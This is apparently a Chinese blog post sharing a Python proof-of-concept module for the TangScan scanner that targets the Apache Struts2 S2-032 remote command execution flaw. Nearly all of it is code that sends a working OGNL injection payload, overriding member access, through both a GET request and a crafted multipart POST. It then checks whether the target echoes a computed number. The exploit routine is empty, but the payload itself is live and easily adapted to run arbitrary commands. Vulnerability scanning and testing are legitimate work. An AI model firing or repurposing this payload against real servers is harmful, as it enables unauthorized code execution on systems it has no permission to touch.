S2-032 远程命令执行 (POC@Tangscan)
前段时间很火的S2-032 远程命令执行
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 |
import re import string from StringIO import StringIO from thirdparty import requests from modules.exploit import TSExploit from StringIO import StringIO class TangScan(TSExploit): def __init__(self): super(self.__class__, self).__init__() self.info = { "name": "S2-032 远程命令执行", "product": "", "product_version": "", "desc": """ S2-032 远程命令执行 """, "license": self.license.TS, "author": ["系统"], "ref": [ {self.ref.wooyun: "http://zone.wooyun.org/content/26856"}, ], "type": self.type.rce, "severity": self.severity.high, "privileged": False, "disclosure_date": "", "create_date": "" } self.register_option({ "url": { "default": "", "required": True, "choices": [], "convert": self.convert.url_field, "desc": "目标 url" } }) self.register_result({ "status": False, "data": { }, "description": "", "error": "" }) def verify(self): exp_url = self.option.url + "?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23w%3d%23context.get(%23parameters.rpsobj[0]),%23w.getWriter().println(88888888-1),%23w.getWriter().flush(),%23w.getWriter().close(),1?%23xx:%23request.toString&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse" try: r = requests.get(exp_url) content = r.content except: content = '' if content.find('88888887') == 0: self.result.status = True self.result.description = "目标 {url} 存在st2命令执行".format( url=self.option.url ) else: try: headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36'} data = {r'reqobj': 'com.opensymphony.xwork2.dispatcher.HttpServletRequest',"rpsobj":"com.opensymphony.xwork2.dispatcher.HttpServletResponse","xxoo":"1"} files = {'test': ('1.jpg', StringIO('1'))} req = requests.Request('POST', self.option.url, headers=headers, data=data,files=files).prepare() req.body = req.body.replace('xxoo', r'method:#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,#w=#context.get(#parameters.rpsobj[0]),#w.getWriter().println(88888888-1),#w.getWriter().flush(),#w.getWriter().close(),1?#xx:#request.toStringj') req.headers['Content-Length'] = len(req.body) s = requests.Session() reponse = s.send(req, timeout=10, verify=False, allow_redirects=False) if reponse.content.find('88888887') == 0: self.result.status = True self.result.description = "目标 {url} 存在st2命令执行".format( url=self.option.url ) except Exception,e: print str(e) def exploit(self): pass if __name__ == '__main__': from modules.main import main main(TangScan()) |
近期评论